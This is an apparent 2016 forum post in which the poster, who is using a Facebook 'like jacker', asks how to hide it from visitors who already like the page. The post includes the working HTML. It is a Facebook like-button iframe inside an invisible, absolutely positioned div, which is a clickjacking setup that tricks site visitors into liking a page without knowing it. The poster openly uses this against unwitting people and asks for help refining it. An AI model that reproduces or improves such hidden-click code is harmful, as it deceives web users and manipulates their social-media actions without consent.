69.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

11-14-2016, 01:30 PM
Post: #1
Facebook like jacker how to remove the like button when people already like?
Hi everyone,

i found this like jacker i have been using but when someone already likes the page it still shows the like or unlike buttons and does not dissappear

i have tried messing with the code so it doesnt show if they already like but im not sure how to do it and i dont know much about coding...

can anyone tell me how to hide it for people that already like please? thanks

here is the div part
Code:
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">




         <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/{mypagewashere}&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
        
      <!--end facebook like frame code-->

    </div>
[Image: R6J1MVo.png]




57.gif